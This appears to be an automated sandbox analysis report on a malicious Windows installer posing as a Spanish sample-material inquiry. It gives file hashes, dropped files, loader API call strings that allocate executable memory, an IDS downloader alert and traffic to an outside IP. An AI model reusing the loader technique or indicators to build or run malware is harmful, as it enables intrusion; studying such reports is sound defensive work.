                                              Size (bytes):454171
                                              Entropy (8bit):7.060003668301988
                                              Encrypted:false
                                              SSDEEP:6144:lYyr+wzZMtTXeNz+AoNhtveHXaewzniZpbOPPEt2MZsOff6fY2GyNfaOg1iZXMuq:/XZguNyAstveHjRpiHaeYlyJgi1J6/wo
                                              MD5:895B2AA12C62FA49CAFA05FE93FFD114
                                              SHA1:0BDE9915A3B79D31ABE109F10A166E1C684EED84
                                              SHA-256:A20EE65D3D538B9C3B635FAA03CB3371D05B553A3E478301713475CF22AC0378
                                              SHA-512:306D64F380D18B9FA5630622BBFD54320B50C98069789794501CB662CA3D4A30D32591A5E74CE4CC70A4FA207DC2B0A91E03DB545F5D4E4B568F5FBFFC1B6DBE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....)).........x..{......::......... ........ss.[.\\\............q..............nnn..`..___..............`....................?.............RR..CC...;........XX......CCC.9....................o...........ZZ................/...o............t....................JJ...........DD..............................a................vvvv....5.............$$............[...........=....................''..........................................}.VVV...............x........[[......................~.........*.....LL..............u.............++++.........D...........f........................(.P............s............R.....%..........................y....44444.......................#####...................B.......V..++...v...........].........u.......x......wwww.......uu..................1...........QQQ....iiii....................................JJJJ.......C........kkk.......................PP.................................................../.....................fffff................j............
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):76279
                                              Entropy (8bit):4.566121540339259
                                              Encrypted:false
                                              SSDEEP:1536:TepvlSp/JrShEKs/9naZ8CenNTbwU5cZlP:lxubs/FaZRentlcZlP
                                              MD5:8FE8820A535A35F77BA5E771D1675C1F
                                              SHA1:0F562B7ABE1C629BFACFE5EF6EE2E7FDF489E6FF
                                              SHA-256:A6675D13C85BEC9B789AC6BE039186512E135A49796CD1D675C8E57B94AC93BE
                                              SHA-512:AB9F64FCA4B6FA824522A19158BC761ABC360BC6D5418BB33754A0CA5F3914864D8857F06FA09DD43148F6B851A8020414AEB7EA2EBC2D607FB05E9EFA0EEAAB
                                              Malicious:false
                                              Reputation:low
                                              Preview:.n.......00....#.%.v........,,..........n..........$....U...............................SSS........0........... ....s........888....(................Y......~......._.~~...............???...VV.....`.OOOO..6666.//..............t.~.++............LLL...........................R....hh.....5555.................3.......................(((((......~.,...WWW.................)...$.......................vvv........;...3.....LLL...../...........................................*...&&&&...........FF......^^^...............@........S........ssss..........iii.........^^^^..R.......J.... ................VV.aa.....OOO...........aaa...........^^..................................M.......<<..555555..........JJJ.................z....K....................kkk... ...........b..................\\...............7..............._..........................qqq..........77....44...................D.%.........oo........@................7.........--.................EEE.4..6.8.....A......iii..........0.s...............
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with very long lines (316), with no line terminators
                                              Category:dropped
                                              Size (bytes):316
                                              Entropy (8bit):4.160293688112871
                                              Encrypted:false
                                              SSDEEP:6:25jUkpgCL4f1SJuCDhztPFP1eVVI0UJlAbDFJ0DBrbcs8IA5qGMyf8:QtlVkCD3N1eVVI02lqZJ2Xcs8jq5y0
                                              MD5:180BC63FD564D436E77F4B1B8D4FA95B
                                              SHA1:319A735C760816FDA0C4DDDABF317B3901ACAC0C
                                              SHA-256:EB24E34D8512F264D1481CC0257B953EB7EA59E17E6C2B52C7BA75383AD95702
                                              SHA-512:93770DBA9CD1E9EC955B49F97453BDF64600CB85545024C0089E00AED774F872A02836D679D0FDF89B51C4EDB582458F2A1F90A60FAC5BF25B6C017A4BE4E9E5
                                              Malicious:false
                                              Reputation:low
                                              Preview:oxygenic sievert cuba haandkbsmedicin skibsprovianteringshandlere glenlike,sercom modkravs skatteprocenter isolator.iranerens resteredes helleristningerne dramadokumentarisk computeranalysens,regnestokkenes delsinds randomization sangbundens.ts lycaenidae rnnebrrets strongarmer ddpunktets.faenomenale kry magnetisr.
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:GTA audio index data (SDT)
                                              Category:dropped
                                              Size (bytes):291815
                                              Entropy (8bit):1.2503547886635011
                                              Encrypted:false
                                              SSDEEP:768:B619gCbp2tU4cdMMk8zW9osMZ0U8yMMFlOHO9GgJ07rMY/E6H4tHVQ/yX1n9/prN:Wh28VOu0gsXwH55/PXeFD0
                                              MD5:2994541347567C65EEDCFA2029506F84
                                              SHA1:0B6DC92057E94AFA373637CC924B56965E65E579
                                              SHA-256:7B670BA87744B976140651094070C279D64EA1F076B675BEB4A5673E76002F97
                                              SHA-512:F9857303537FFD35695F286D6DF0F08647CCF046153AF5C384E4265B4BE29E69F502A05BF0FDFB39EC5905BFFCB6AD03F864A7183A6451CD4CDB387AB575D4CD
                                              Malicious:false
                                              Preview:...........................................................................................................T....................................................................................J.................................................................................I....................................E.......................~.......^.I................................,........................).................o.........F.....U..U..........$...............................(...N..........E............................................../..................................;.h....S.......J...................................d..........?.d....................%....................................... ..d........S................+.....'....l....................i...................'..........................................................n....1...................................e..................z................................................p...........................U.................
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:FoxPro FPT, blocks size 11776, next free block index 1476395008, field type 0
                                              Category:dropped
                                              Size (bytes):344138
                                              Entropy (8bit):1.2533978536728678
                                              Encrypted:false
                                              SSDEEP:768:s3GdopoGgQYbO1t4HeMv0bgZwG+iCwer+phFXlGmeDbyf394AWBfLIbwglGpbQce:+gsweMnSwF739ZEMpEp/G/DLP
                                              MD5:DDAE8F5FBCC4B5A3D7A7D7E17E6AD7F0
                                              SHA1:DAB7A3CBBC236820BDFAFDC244FBCB92657B424E
                                              SHA-256:492E59C5FF7961BCB4E09615632195CA13206538793274D7AED2C07D0EC7C730
                                              SHA-512:3E0DE00751C9BB0BEEACBCBA9262F6B90261ACAADE205C7797D4BF5E25A030E08D403E48D4DB650724F45DE615E3F2328812D7F211886527B21DB522D6163263
                                              Malicious:false
                                              Preview:X.............................................................................................i....................................................................;..........................O......................................................:............................"................/.............................................p.................].................$.........................{....................T......................................$......................................._.................}............................................"....................u.....b.................?........................c................................m..........................<.................^..................o....c........................0............................{..........................................~......>............................................N................................\......................................U......9.........W..m.................h......
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):52
                                              Entropy (8bit):4.0914493934217315
                                              Encrypted:false
                                              SSDEEP:3:sBa99k1NoCFOn:KankVg
                                              MD5:5D04A35D3950677049C7A0CF17E37125
                                              SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                              SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                              SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                              Malicious:false
                                              Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1470411
                                              Entropy (8bit):3.911219342334645
                                              Encrypted:false
                                              SSDEEP:12288:oP7kXZguNyAstveHjRpiHaeYlyJgi1J6/whhzFih:MwXK2nstveH9pi6eYlyJd76/whvc
                                              MD5:2E5093B10CCB033C1AF87EDD700E0D41
                                              SHA1:52B7DB0120B5B274A38865558CD15AA99D4D6235
                                              SHA-256:3587329A6C538531E004DCC0385140740460D774EB27C5E5CFEACB6055E3C073
                                              SHA-512:ACC0DE2519C7F941A32E8C1185258D386157883EDCA39197CB8E9A12D2EED11D5E6749DC0E7426ADB34C0B5EEDED382D1ECC5B250C07F6593AEE43166A026573
                                              Malicious:false
                                              Preview: 7......,........................ ......V6...... 7..........................o....................G..........m...............................................................................................................................................................................G...f...............j...............................................................................................................................{.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):74
                                              Entropy (8bit):3.9637832956585757
                                              Encrypted:false
                                              SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                              MD5:16D513397F3C1F8334E8F3E4FC49828F
                                              SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                              SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                              SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                              Malicious:false
                                              Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):56
                                              Entropy (8bit):4.313578413943262
                                              Encrypted:false
                                              SSDEEP:3:sAAEVvjsLPJ0j84n:fL+q
                                              MD5:8CCB0932855A1FFE032CEE4D39A97F5C
                                              SHA1:76131DA7F01EF73DB35B01357E9BD65F018F259D
                                              SHA-256:7556233F3D86DEAA74A8DB71B44EBC802D4E8B4913E2DBA5A8EFF2DF8EEB3612
                                              SHA-512:84A4F728719D472F44A29C7BAE197CDCCC40A6A3FA7D4FB46014429B53998E32F60B8CC3DE5932AFF3488AE25BCB9A67E4AF0CCFF478113CE576C9F236844B19
                                              Malicious:false
                                              Preview:kernel32::ReadFile(i r5, i r1, i 65441792,*i 0, i 0)i.r3
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):30
                                              Entropy (8bit):4.256564762130954
                                              Encrypted:false
                                              SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                              MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                              SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                              SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                              SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                              Malicious:false
                                              Preview:user32::EnumWindows(i r1 ,i 0)
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.556297888280895
                                              Encrypted:false
                                              SSDEEP:3:sEMBQEJkJVEjQPJ9xQoXUn:x9xvUn
                                              MD5:5540F2EB7E351633A36A50098BB3AEC7
                                              SHA1:1C8AB822B73D242AB05789046B631859C6F8DBC7
                                              SHA-256:EE4FCB5AC33527A7BE215FF98E7B89F000180D5CC319DA66B566999541F3B35C
                                              SHA-512:34D4226685E9273C5EA0B74058CA644A7FC46FCA115256E3C890BC6CD786C89A7A7DEB4EEC45311FD8C187E469CCD7AC146827CCA80BA46DC19D23C381532003
                                              Malicious:false
                                              Preview:kernel32::VirtualAlloc(i 0,i 65441792, i 0x3000, i 0x40)p.r1
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):11776
                                              Entropy (8bit):5.656065698421856
                                              Encrypted:false
                                              SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                              MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                              SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                              SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                              SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: SecuriteInfo.com.Riskware.Application.5189.31489.exe, Detection: malicious, Browse
                                              • Filename: INQ No. HDPE-16-GM-00- PI-INQ-300.bat.exe, Detection: malicious, Browse
                                              • Filename: INQ No. HDPE-16-GM-00- PI-INQ-300.bat.exe, Detection: malicious, Browse
                                              • Filename: INQ No. HDPE-16-GM-00.bat.exe, Detection: malicious, Browse
                                              • Filename: INQ No. HDPE-16-GM-00.bat.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.FileRepMalware.18455.13769.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.FileRepMalware.18455.13769.exe, Detection: malicious, Browse
                                              • Filename: HSBC Payment Advice.exe, Detection: malicious, Browse
                                              • Filename: DHL STATEMENT OF ACCOUNT - 30082024.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):620120
                                              Entropy (8bit):7.854462833577522
                                              Encrypted:false
                                              SSDEEP:12288:LziLE5mL2ElK5ZaogX46imb569QKOI5nETg9V0baQCtxNwho5aMqHF:CwIL2xZaomziC569H/9GajtjL5aMW
                                              MD5:C6C117C18FEAD29FB0E5393139D0B0F2
                                              SHA1:73A18E382DE6516DAC2FFB386A7FBCBCD3BB4101
                                              SHA-256:65A95EBB11D9F2916453CB3C2B7E45B583BA360AF7BFD915547DE103B78CFE5E
                                              SHA-512:D92B5C3064BF186BF716F154DF5A4C8309D359176A3F5ABDB5BA317F3C6A6811AFE4793349195B9471AF7C176F74AD31835233CA1E18BA883382E820BCF58ACA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 37%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@.................................A"....@.........................................................xc...............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.854462833577522
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe
                                              File size:620'120 bytes
                                              MD5:c6c117c18fead29fb0e5393139d0b0f2
                                              SHA1:73a18e382de6516dac2ffb386a7fbcbcd3bb4101
                                              SHA256:65a95ebb11d9f2916453cb3c2b7e45b583ba360af7bfd915547de103b78cfe5e
                                              SHA512:d92b5c3064bf186bf716f154df5a4c8309d359176a3f5abdb5ba317f3c6a6811afe4793349195b9471af7c176f74ad31835233ca1e18ba883382e820bcf58aca
                                              SSDEEP:12288:LziLE5mL2ElK5ZaogX46imb569QKOI5nETg9V0baQCtxNwho5aMqHF:CwIL2xZaomziC569H/9GajtjL5aMW
                                              TLSH:BDD4120BBA1C836ED7A88FB1787983714A59EF571110B5A7FAC4FC1D183024D7D1A2E6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@
                                              Icon Hash:24ed8d96b2ade832
                                              Entrypoint:0x40344a
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:4ea4df5d94204fc550be1874e1b77ea7
                                              Signature Valid:false
                                              Signature Issuer:CN="Outguard Investorerne Aljofaina ", O=Idrtsstvner, L=Edge, S=England, C=GB
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 30/07/2024 10:36:23 30/07/2027 10:36:23
                                              Subject Chain
                                              • CN="Outguard Investorerne Aljofaina ", O=Idrtsstvner, L=Edge, S=England, C=GB
                                              Version:3
                                              Thumbprint MD5:0E8398E740E2EDBD20D0FA14E299A59D
                                              Thumbprint SHA-1:460E894CF28A243CE9B15B1B2CA56C2CC7813FA7
                                              Thumbprint SHA-256:DD84949708B928A1FB82EC77622879846B5C48BBF678DC8A8323C87685217C48
                                              Serial:4BB35FA7D52B3F7A4BDF54AC3352ACC3A7E373A2
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+14h], ebx
                                              mov dword ptr [esp+10h], 0040A230h
                                              mov dword ptr [esp+1Ch], ebx
                                              call dword ptr [004080B4h]
                                              call dword ptr [004080B0h]
                                              cmp ax, 00000006h
                                              je 00007F954CB9F0F3h
                                              push ebx
                                              call 00007F954CBA224Ch
                                              cmp eax, ebx
                                              je 00007F954CB9F0E9h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082B8h
                                              push esi
                                              call 00007F954CBA21C6h
                                              push esi
                                              call dword ptr [0040815Ch]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], 00000000h
                                              jne 00007F954CB9F0CCh
                                              push ebp
                                              push 00000009h
                                              call 00007F954CBA221Eh
                                              push 00000007h
                                              call 00007F954CBA2217h
                                              mov dword ptr [0042A244h], eax
                                              call dword ptr [0040803Ch]
                                              push ebx
                                              call dword ptr [004082A4h]
                                              mov dword ptr [0042A2F8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebx
                                              push 004216E8h
                                              call dword ptr [00408188h]
                                              push 0040A384h
                                              push 00429240h
                                              call 00007F954CBA1E00h
                                              call dword ptr [004080ACh]
                                              mov ebp, 00435000h
                                              push eax
                                              push ebp
                                              call 00007F954CBA1DEEh
                                              push ebx
                                              call dword ptr [00408174h]
                                              add word ptr [eax], 0000h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xdc18.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x963780x12e0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x61f10x62002ce901035717865394b5faeda5b43e0fFalse0.6656967474489796data6.477074763411717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x13a40x14004ac891d4ddf58633f14436f9f80ac6b6False0.4529296875data5.163001655755973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x203380x600df898dbdc013374b871e011dcd904b20False0.501953125data3.9745558434885093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2b0000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x5d0000xdc180xde0096b7b1967495a97c0dd3d6a3b7e288dfFalse0.0982545045045045data3.812879252233152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x5d1d80xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/mEnglishUnited States0.07864312267657993
                                              RT_DIALOG0x6a4000x120dataEnglishUnited States0.5173611111111112
                                              RT_DIALOG0x6a5200x11cdataEnglishUnited States0.6091549295774648
                                              RT_DIALOG0x6a6400x60dataEnglishUnited States0.7291666666666666
                                              RT_GROUP_ICON0x6a6a00x14dataEnglishUnited States1.15
                                              RT_VERSION0x6a6b80x220dataEnglishUnited States0.5367647058823529
                                              RT_MANIFEST0x6a8d80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                              DLLImport
                                              KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-12T21:29:58.677580+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049715107.150.18.10980TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 12, 2024 21:29:58.229737043 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.453741074 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.453918934 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.454361916 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.677325964 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.677340031 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.677351952 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.677447081 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.677580118 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.677660942 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.901473045 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901489019 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901499987 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901510954 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901520967 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901531935 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901542902 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901554108 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:58.901694059 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:58.901715994 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.124517918 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.124660015 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.124675035 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.124691963 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.124797106 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.124797106 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.124813080 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.125005960 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125020027 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125039101 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125154018 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125159979 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.125159979 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.125180006 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.125319958 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.125896931 CEST8049715107.150.18.109192.168.11.20
